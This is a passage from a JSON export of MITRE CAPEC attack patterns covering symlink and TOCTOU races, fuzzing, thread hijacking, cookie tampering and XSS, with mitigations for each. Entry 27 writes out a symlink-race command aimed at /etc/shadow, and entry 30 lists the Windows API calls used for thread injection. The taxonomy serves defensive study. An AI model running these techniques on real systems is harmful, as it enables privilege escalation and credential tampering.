argv[1];",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"368"},{"CWE_ID":"363"},{"CWE_ID":"366"},{"CWE_ID":"370"},{"CWE_ID":"362"},{"CWE_ID":"662"},{"CWE_ID":"689"},{"CWE_ID":"667"},{"CWE_ID":"665"},{"CWE_ID":"1223"},{"CWE_ID":"1254"},{"CWE_ID":"1298"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-105","Section":"Race condition"},{"External_Reference_ID":"REF-106"},{"External_Reference_ID":"REF-107","Section":"Test Case ID 1598"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"27":{"ID":"27","Name":"Leveraging Race Conditions via Symbolic Links","Abstraction":"Detailed","Status":"Draft","Description":"This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers\' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"29"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Verify that target host\'s platform supports symbolic links.] This attack pattern is only applicable on platforms that support symbolic links.","Technique":["Research target platform to determine whether it supports symbolic links.","Create a symbolic link and ensure that it works as expected on the given platform."]},{"Step":"2","Phase":"Explore","Description":"[Examine application\'s file I/O behavior] Analyze the application\'s file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.","Technique":["Use kernel tracing utility such as ktrace to monitor application behavior.","Use debugging utility such as File Monitor to monitor the application\'s filesystem I/O calls","Watch temporary directories to see when temporary files are created, modified and deleted.","Analyze source code for open-source systems like Linux, Apache, etc."]},{"Step":"3","Phase":"Experiment","Description":"[Verify ability to write to filesystem] The attacker verifies ability to write to the target host\'s file system.","Technique":["Create a file that does not exist in the target directory (e.g. \\"touch temp.txt\\" in UNIX-like systems)","On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.","Verify permissions on target directory"]},{"Step":"4","Phase":"Exploit","Description":"[Replace file with a symlink to a sensitive system file.] Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.","Technique":["Create an infinite loop containing commands such as \\"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\\". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) \\"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\\", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.","Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it."]}]},"Prerequisites":{"Prerequisite":["The attacker is able to create Symlink links on the target host.","Tainted data from the attacker is used and copied to temporary files.","The target host does insecure temporary file creation."]},"Skills_Required":{"Skill":["This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them).",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Use safe libraries when creating temporary files. For instance the standard library function mkstemp can be used to safely create temporary files. For shell scripts, the system utility mktemp does the same thing.","Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.","Follow the principle of least privilege when assigning access rights to files.","Ensure good compartmentalization in the system to provide protected areas that can be trusted."]},"Example_Instances":{"Example":[{"p":["In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \\"efficiency,\\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.","The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with \\"user\\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \\"user password\\")) in it. It removes the temporary file (merely removing the symbolic link).","Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.","[REF-115]"]},"GNU \\"ed\\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939","OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894","Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"367"},{"CWE_ID":"61"},{"CWE_ID":"662"},{"CWE_ID":"689"},{"CWE_ID":"667"}]},"References":{"Reference":[{"External_Reference_ID":"REF-115","Section":"Symlink race"},{"External_Reference_ID":"REF-116"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"}]}},"28":{"ID":"28","Name":"Fuzzing","Abstraction":"Meta","Status":"Draft","Description":"In this attack pattern, the adversary leverages fuzzing to try to identify weaknesses in the system. Fuzzing is a software security and functionality testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occurred. Fuzzing treats the system as a black box and is totally free from any preconceptions or assumptions about the system. Fuzzing can help an attacker discover certain assumptions made about user input in the system. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions despite not necessarily knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve their goals.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Observe communication and inputs] The fuzzing attacker observes the target system looking for inputs and communications between modules, subsystems, or systems.","Technique":["Network sniffing. Using a network sniffer such as wireshark, the attacker observes communications into and out of the target system.","Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the attacker observes the system calls and API calls that are made by the target system, and the nature of their parameters.","Observe inputs using web inspection tools (OWASP\'s WebScarab, Paros, TamperData, TamperIE, etc.)"]},{"Step":"2","Phase":"Experiment","Description":"[Generate fuzzed inputs] Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.","Technique":["Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).","Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system."]},{"Step":"3","Phase":"Experiment","Description":"[Observe the outcome] Observe the outputs to the inputs fed into the system by fuzzers and see if anything interesting happens. If failure occurs, determine why that happened. Figure out the underlying assumption that was invalidated by the input."},{"Step":"4","Phase":"Exploit","Description":"[Craft exploit payloads] Put specially crafted input into the system that leverages the weakness identified through fuzzing and allows to achieve the goals of the attacker. Fuzzers often reveal ways to slip through the input validation filters and introduce unwanted data into the system.","Technique":["Identify and embed shell code for the target system.","Embed higher level attack commands in the payload. (e.g., SQL, PHP, server-side includes, etc.)","Induce denial of service by exploiting resource leaks or bad error handling."]}]},"Skills_Required":{"Skill":["There is a wide variety of fuzzing tools available.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Fuzzing tools."},"Indicators":{"Indicator":"A lot of invalid data is fed to the system. Data that cannot have been generated through a legitimate transaction/request. Data is coming into the system within a short period of time and potentially from the same IP."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic"}]},"Mitigations":{"Mitigation":["Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no assumptions about the validity of data are made.","Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior."]},"Example_Instances":{"Example":"A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"20"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"29":{"ID":"29","Name":"Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions","Abstraction":"Standard","Status":"Draft","Description":"This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by \\"running the race\\", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"26","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary explores to gauge what level of access they have."},{"Step":"2","Phase":"Experiment","Description":"The adversary confirms access to a resource on the target host. The adversary confirms ability to modify the targeted resource."},{"Step":"3","Phase":"Exploit","Description":"The adversary decides to leverage the race condition by \\"running the race\\", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary can replace the resource and cause an escalation of privilege."}]},"Prerequisites":{"Prerequisite":["A resource is access/modified concurrently by multiple processes.","The adversary is able to modify resource.","A race condition exists while accessing a resource."]},"Skills_Required":{"Skill":["This attack can get sophisticated since the attack has to occur within a short interval of time.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Use safe libraries to access resources such as files.","Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.","Use synchronization to control the flow of execution.","Use static analysis tools to find race conditions.","Pay attention to concurrency problems related to the access of resources."]},"Example_Instances":{"Example":["The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057",{"p":["The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an adversary can replace the file referenced by the name.","[REF-107]"],"div":["include ",{"style":"margin-left:10px;","class":"bad","div":["int fd;",{"style":"margin-left:10px;","div":["return;",{"style":"margin-left:10px;"}]},"char *userstr;",{"style":"margin-left:10px;","div":["userstr = argv[1];",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"367"},{"CWE_ID":"368"},{"CWE_ID":"366"},{"CWE_ID":"370"},{"CWE_ID":"362"},{"CWE_ID":"662"},{"CWE_ID":"691"},{"CWE_ID":"663"},{"CWE_ID":"665"}]},"References":{"Reference":[{"External_Reference_ID":"REF-131"},{"External_Reference_ID":"REF-107","Section":"Test Case ID 1598"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Related_Attack_Patterns"}]}},"30":{"ID":"30","Name":"Hijacking a Privileged Thread of Execution","Abstraction":"Standard","Status":"Draft","Description":"An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process\'s memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target thread] The adversary determines the underlying system thread that is subject to user-control"},{"Step":"2","Phase":"Experiment","Description":"[Gain handle to thread] The adversary then gains a handle to a process thread.","Technique":["Use the \\"OpenThread\\" API call in Windows on a known thread.","Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it."]},{"Step":"3","Phase":"Experiment","Description":"[Alter process memory] Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.","Technique":"On Windows, use \\"SuspendThread\\" followed by \\"VirtualAllocEx\\", \\"WriteProcessMemory\\", and \\"SetThreadContext\\"."},{"Step":"4","Phase":"Exploit","Description":"[Resume thread execution] Once the process memory has been altered to execute malicious code, the thread is then resumed.","Technique":"On Windows, use \\"ResumeThread\\"."}]},"Prerequisites":{"Prerequisite":["The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users","In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute."]},"Skills_Required":{"Skill":["Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread.",{"Level":"High"}]},"Resources_Required":{"Resource":{"p":["None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.","The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary\'s malicious code. This is the case even if the adversary conducts the attack remotely."]}},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.","Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope."]},"Example_Instances":{"Example":"Adversary targets an application written using Java\'s AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"270"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1055.003","Entry_Name":"Process Injection:Thread Execution Hijacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Probing_Techniques, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, Probing_Techniques"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Prerequisites"}]}},"31":{"ID":"31","Name":"Accessing/Intercepting/Modifying HTTP Cookies","Abstraction":"Detailed","Status":"Draft","Description":"This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie\'s content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"39"},{"Nature":"ChildOf","CAPEC_ID":"157","Exclude_Related":{"Exclude_ID":"513"}}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain copy of cookie] The adversary first needs to obtain a copy of the cookie. The adversary may be a legitimate end user wanting to escalate privilege, or could be somebody sniffing on a network to get a copy of HTTP cookies.","Technique":["Sniff cookie using a network sniffer such as Wireshark","Obtain cookie using a utility such as the Firefox Cookie Manager, Chrome DevTools or AnEC Cookie Editor.","Steal cookie via a cross-site scripting attack.","Guess cookie contents if it contains predictable information."]},{"Step":"2","Phase":"Experiment","Description":"[Obtain sensitive information from cookie] The adversary may be able to get sensitive information from the cookie. The web application developers may have assumed that cookies are not accessible by end users, and thus, may have put potentially sensitive information in them.","Technique":["If cookie shows any signs of being encoded using a standard scheme such as base64, decode it.","Analyze the cookie\'s contents to determine whether it contains any sensitive information."]},{"Step":"3","Phase":"Experiment","Description":"[Modify cookie to subvert security controls.] The adversary may be able to modify or replace cookies to bypass security controls in the application.","Technique":["Modify logical parts of cookie and send it back to server to observe the effects.","Modify numeric parts of cookie arithmetically and send it back to server to observe the effects.","Modify cookie bitwise and send it back to server to observe the effects.","Replace cookie with an older legitimate cookie and send it back to server to observe the effects. This technique would be helpful in cases where the cookie contains a \\"points balance\\" for a given user where the points have some value. The user may spend their points and then replace their cookie with an older one to restore their balance."]}]},"Prerequisites":{"Prerequisite":["Target server software must be a HTTP daemon that relies on cookies.","The cookies must contain sensitive information.","The adversary must be able to make HTTP requests to the server, and the cookie must be contained in the reply."]},"Skills_Required":{"Skill":["To overwrite session cookie data, and submit targeted attacks via HTTP",{"Level":"Low"},"Exploiting a remote buffer overflow generated by attack",{"Level":"High"}]},"Resources_Required":{"Resource":"A utility that allows for the viewing and modification of cookies. Many modern web browsers support this behavior."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Use input validation for cookies","Design: Generate and validate MAC for cookies","Implementation: Use SSL/TLS to protect cookie in transit","Implementation: Ensure the web server implements all relevant security patches, many exploitable buffer overflows are fixed in patches issued for the software."]},"Example_Instances":{"Example":"There are two main attack vectors for exploiting poorly protected session variables like cookies. One is the local machine itself which can be exploited directly at the physical level or indirectly through XSS and phishing. In addition, the adversary in the middle attack (CAPEC-94) relies on a network sniffer, proxy, or other intermediary to intercept the subject\'s credentials and use them to impersonate the digital subject on the host. The issue is that once the credentials are intercepted, impersonation is trivial for the adversary to accomplish if no other protection mechanisms are in place. See also: CVE-2010-5148 , CVE-2016-0353"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"565"},{"CWE_ID":"302"},{"CWE_ID":"311"},{"CWE_ID":"113"},{"CWE_ID":"539"},{"CWE_ID":"20"},{"CWE_ID":"315"},{"CWE_ID":"384"},{"CWE_ID":"472"},{"CWE_ID":"602"},{"CWE_ID":"642"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Example_Instances, Related_Weaknesses"}]}},"32":{"ID":"32","Name":"XSS Through HTTP Query Strings","Abstraction":"Detailed","Status":"Draft","Description":"An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim\'s browser.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"591"},{"Nature":"ChildOf","CAPEC_ID":"588"},{"Nature":"ChildOf","CAPEC_ID":"592"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Spider] Using a browser or an automated tool, an attacker follows all public links on a web site. They record all the links they find.","Technique":["Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.","Use a browser to manually explore the website and analyze how it is constructed. Many browser\'s plugins are available to facilitate the analysis or automate the URL discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Attempt variations on input parameters] Possibly using an automated tool, an attacker requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.","Technique":["Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.","Use a proxy tool to record results of manual input of XSS probes in known URLs."]},{"Step":"3","Phase":"Exploit","Description":"[Steal session IDs, credentials, page content, etc.] As the attacker succeeds in exploiting the vulnerability, they can choose to steal user\'s credentials in order to reuse or to analyze them later on.","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and sends document information to the attacker.","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute appropriately."]},{"Step":"4","Phase":"Exploit","Description":"[Forceful browsing] When the attacker targets the current application or another one (through CSRF vulnerabilities), the user will then be the one who perform the attacks without being aware of it. These attacks are mostly targeting application logic flaws, but it can also be used to create a widespread attack against a particular website on the user\'s current network (Internet or not).","Technique":["Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and performs actions on the same web site","Develop malicious JavaScript that injected through vectors identified during the Experiment Phase and takes commands from an attacker\'s server and then causes the browser to execute request to other web sites (especially the web applications that have CSRF vulnerabilities)."]},{"Step":"5","Phase":"Exploit","Description":"[Content spoofing] By manipulating the content, the attacker targets the information that the user would like to get from the website.","Technique":"Develop malicious JavaScript that is injected through vectors identified during the Experiment Phase and loaded by the victim\'s browser and exposes attacker-modified invalid information to the user on the current web page."}]},"Prerequisites":{"Prerequisite":"Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation."},"Skills_Required":{"Skill":["To place malicious payload on server via HTTP",{"Level":"Low"},"Exploiting any information gathered by HTTP Query on script host",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to send HTTP post to scripting host and collect output"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Design: Utilize strict type, character, and encoding enforcement","Design: Server side developers should not proxy content via XHR or other means, if a http proxy for remote content is setup on the server side, the client\'s browser has no way of discerning where the data is originating from.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content, including remote and user-generated content","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Session tokens for specific host","Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.","Implementation: Privileges are constrained, if a script is loaded, ensure system runs in chroot jail or other limited authority mode"]},"Example_Instances":{"Example":["http://user:host@example.com:8080/oradb